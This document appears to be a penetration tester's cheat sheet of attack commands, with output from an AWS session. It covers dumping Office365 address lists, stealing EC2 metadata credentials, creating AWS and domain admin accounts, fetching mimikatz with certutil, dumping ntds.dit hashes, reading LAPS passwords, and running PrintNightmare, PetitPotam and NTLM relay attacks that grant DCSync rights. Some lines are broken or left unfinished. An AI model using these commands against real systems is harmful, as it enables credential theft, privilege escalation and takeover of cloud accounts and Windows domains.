
Office365/OWA (MailSniper) - github repo

Dump e-mail accounts after first account compromise

Import-Module MailSniper.ps1
Get-GlobalAddressList -ExchHostname 'outlook.office365.com' -UserName 'username@domain.com.br' -Password 'Spring2017' -OutFile global-address-list.txt


Convert access keys to console access https://github.com/NetSPI/aws_consoler

aws configure
aws sts get-caller-identity     # Get ec2 role name 
aws iam list-attached-role-policies --role-name {role_name}
aws iam get-policy-version --policy-arn {policy_arn} --version-id V1

EC2 instances have policies attached to them, we need to first understand their privileges and then move accordly.

aws sts get-caller-identity
    "UserId": "AROA3LQ5G6SYMS7LOLCPH:i-asdasd",
    "Account": "780671579312",
    "Arn": "arn:aws:sts::780671579312:assumed-role"

Retrieve instance metadata to get aws credentials.

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v`
  "Code" : "Success",
  "LastUpdated" : "2021-03-24T18:42:47Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "REDACTED",
  "SecretAccessKey" : "REDACTED",
  "Token" : "LQ==",
  "Expiration" : "2021-03-25T00:44:50Z"

Enumerate policies attached to role

# 25/03 11:25
ubuntu@ip-10-194-136-21:~$ aws iam list-attached-role-policies --role-name role-name
    "AttachedPolicies": [
            "PolicyName": "policy-kms-encryption-security",
            "PolicyArn": "arn:aws:iam::780671579312:policy/policy-kms-encryption-security"
            "PolicyName": "policy-sec-patch-mgmt",
            "PolicyArn": "arn:aws:iam::780671579312:policy/policy-sec-patch-mgmt"
            "PolicyName": "AmazonEC2FullAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonEC2FullAccess"
            "PolicyName": "IAMFullAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/IAMFullAccess"
            "PolicyName": "AutoScalingFullAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AutoScalingFullAccess"
            "PolicyName": "CloudWatchAgentServerPolicy",
            "PolicyArn": "arn:aws:iam::aws:policy/CloudWatchAgentServerPolicy"
            "PolicyName": "AWSElasticBeanstalkWebTier",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier"
            "PolicyName": "AmazonSSMManagedInstanceCore",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore"
            "PolicyName": "AWSElasticBeanstalkMulticontainerDocker",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker"
            "PolicyName": "AWSElasticBeanstalkWorkerTier",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier"
root@kali:/home/ec2-user# aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --version-id v1
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                    "Action": "ec2:*",
                    "Effect": "Allow",
                    "Resource": "*"
                    "Effect": "Allow",
                    "Action": "elasticloadbalancing:*",
                    "Resource": "*"
                    "Effect": "Allow",
                    "Action": "cloudwatch:*",
                    "Resource": "*"
                    "Effect": "Allow",
                    "Action": "autoscaling:*",
                    "Resource": "*"
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2015-02-06T18:40:15+00:00"

Enumerate privilege of role

# 25/03 11:29
ubuntu@ip-10-194-136-21:~$ aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --version-id v1
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                    "Effect": "Allow",
                    "Action": "iam:*",
                    "Resource": "*"
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2015-02-06T18:40:38Z"

Create new user and add it to the supergroup

aws iam create-user --user-name aws-admin2

List all policies and all groups

aws iam list-policies
aws iam list-groups
aws iam add-user-to-group --group-name FullAdmins --user-name aws-admin2

EC2 privilege escalation

List keypairs of keys

aws ec2 describe-key-pairs

List instances running

aws ec2 describe-instances --filters Values=running

Attach policy to role

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --role-name role-ec2

Pushes SSH key to instance

aws ec2-instance-connect send-ssh-public-key \
    --instance-id i-1234567890abcdef0 \
    --instance-os-user ec2-user \
    --availability-zone us-east-2b \
    --ssh-public-key file://path/my-rsa-key.pub


import_keys <profile-name>

AD and Powershell

Powershell mode

powershell -Command "$ExecutionContext.SessionState.LanguageMode"

Restore deleted objects from Recycle Bin

# 1. Check if the feature is enabled
Get-ADOptionalFeature "Recycle Bin Feature" | select-object name, EnabledScopes
# 2. Retrieve AD Object and restore it
Get-ADObject -Filter 'sAMAccountName -eq "DeletedAdmin"' | Restore-ADObject

Check user ACLs

(Get-ACL "AD:$((Get-ADUser myaccount).distinguishedname)").access

Bloodhound ingestor - https://hunter2.gitbook.io/darthsidious/enumeration/bloodhound

Invoke-Bloodhound -CollectionMethod All -Compress

Check password policy for lockouts

net accounts

Get current domain and domain controller


Search logged on users (From domain joined computer)

Import-Module .\PowerView.ps1
Get-NetLoggedon -ComputerName client123 # -Server dc01.corp
Get-NetSession -ComputerName dc01

List domain users

net user /domain

Powershell prompt in domain context (Useful for bloodhound ingestor from outside a domain-joined box or querying stuff in AD)

runas /netonly /user:domain\user powershell

All Groups that the user belongs to

Get-ADPrincipalGroupMembership user | Select name

Adding user to domain (Need RSAT module)

New-ADUser -Name "Satinha da Silva" -Samusername "sata.silva" -Enabled $True
Add-ADGroupMember -Identity "Domain Admin" -Members "satinha"

Creating local user

Password = Read-Host -AsSecureString
New-LocalUser "User03" -Password $Password -FullName "Third User" -Description "Description of this account."
# cmd.exe
net user username password /add
net localgroup Administrators username /add

Download files from windows

certutil.exe -urlcache -split -f mimikatz.exe
IWR -Uri http://asdasd.com.br/file.exe -Outfile file.exe # (Invoke-WebRequest)

Remote dump ntds.dit file

secretsdump.py -just-dc-ntlm domain/user@dc-name.corp 43ad9d72b6fad288056f81166418c3bf

Object properties

Get-ADObject -SearchBase "DC=corp,DC=local" -filter 'SamAccountName -eq "admin"' -property *

Enumerate LDAP distingued names

ldapsearch -x -h dc-01.corp.local -s base namingcontexts
# And then dumping it
ldapsearch -x -h dc-01.corp.local -b 'DC=corp,DC=local'

LDAP Queries

Domain attribute ms-DS-MachineAccountQuota => amount of computer accounts a user can add to the domain, 0 = disabled can lead to computer takeover: https://www.youtube.com/watch?v=RUbADHcBLKg TLDR; if compromise account is member/has privileges of GenericAll in a computer we can change the msDS-AllowedToActOnBehalfOfOtherIdentity property of it, allowing we to generate kerberos tickets that allow us to authenticate on it.


Interesting ldap attributes userPassword unicodePwd unixUserPassword msSFU30Password os400Password MS-Mcs-AdmPwd

Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd

Domain trusts


Enumerate trusted domains

PS > nltest.exe /trusted_domains
List of domain trusts:
    0: IDMdomain idm-domain.net (NT 5) (Direct Inbound) ( Attr: foresttrans )
    1: DEVELOPMENT development.net (NT 5) (Direct Inbound)
    2: DOMAIN domain.com (NT 5) (Direct Outbound) (Direct Inbound) ( Attr: foresttrans external )
    3: aws-us-domain aws-us-domain.net (NT 5) (Direct Outbound) (Direct Inbound) ( Attr: foresttrans )
    4: aws-sa-domain aws-sa-domain.net (NT 5) (Direct Outbound) (Direct Inbound) ( Attr: foresttrans )
    5: DOMAIN domain.net (NT 5) (Forest Tree Root) (Primary Domain) (Native)

PS > ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

TopLevelNames            :
ExcludedTopLevelNames    :
TrustedDomainInformation :
SourceName               : domain.net
TargetName               : idmdomain.net
TrustType                : Forest
TrustDirection           : Inbound

TopLevelNames            : {domain.com}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {domain.com}
SourceName               : domain.net
TargetName               : domain.com
TrustType                : Forest
TrustDirection           : Bidirectional

TopLevelNames            : {aws-us-domain.net}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {aws-us-domain.net}
SourceName               : domain.net
TargetName               : aws-us-domain.net
TrustType                : Forest
TrustDirection           : Bidirectional

TopLevelNames            : {aws-sa-domain.net}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {aws-sa-domain.net}
SourceName               : domain.net
TargetName               : aws-sa-domain.net
TrustType                : Forest
TrustDirection           : Bidirectional

ms-ds-machineaccountquota => 

Post-Exploitation / Lateral movement

Quick wins in internal assessments

  1. Passwords in SYSVOL / GPP / MS14-025 - \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
  2. BloodHound
  3. MS14-068 netapi exploit / MS17-010 eternalblue
  4. SPN Scanning - GetUserSPNs.py
  5. mimikatz after elevating privileges
  6. Powershell Remoting + WinRM + AllowUnencrypted
  7. Kerberoast and ASEPRoasting
  8. PrivExchange (Exchange servers)
  9. ntds.dat from backup files
  10. LLMNR+NBT poisoning
  11. IPv6 WPAD poisoning - mimt6
  12. Cred Dump using procdump (find a way to block mimikatz execution)
  13. Resource-based Constrained Delegation
  14. SMB relay
  15. IPv6 DNS Takeover
  16. PrintNightmare
    # if command returns something it is vulnerable
    rpcdump.py @ | egrep 'MS-RPRN|MS-PAR'
    Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
    Protocol: [MS-RPRN]: Print System Remote Protocol
    # PoC
    git clone https://github.com/byt3bl33d3r/ItWasAllADream; 
    cd ItWasAllADream; sudo docker build -t itwasalladream .
    sudo docker run -it itwasalladream -u user -p password -d domain
  17. SeriousSAM(Requires volume shadow copies enabled)
  18. PetitPotam
    # In one pane:
    sudo responder -I eth0 -A
    # weaponizing
    sudo ntlmrelayx.py -t ldap://dc2-domain.com --delegate-acess
    # PoC
    sudo python3 Petitpotam.py attacker-ip dc-ip
  19. AD CS (Certificate Services), exploitation in [[pki-abuse]]
  20. Token Impersonation with rubeus
  21. Kerberoasting


  1. ntds.dit file using secretdump.py
  2. Golden ticket
  3. DCSync attacks
  4. DCShadown

Credential relay

ntlmrelayx.py flags

Create domain user and gives DCSync rights ntlmrelayx.py -t ldaps://dc1-domain.com --delegate-acess -smb2support --remove-mic

Create a domain computer account ntlmrelayx.py -t ldaps://dc1-domain.com --add-computer -smb2support --remove-mic

Gives DCSync rights to an existing domain user / computer ntlmrelayx.py -t ldaps://dc1-domain.com --escalate-user lowuser/computer -smb2support --remove-mic

Aditional info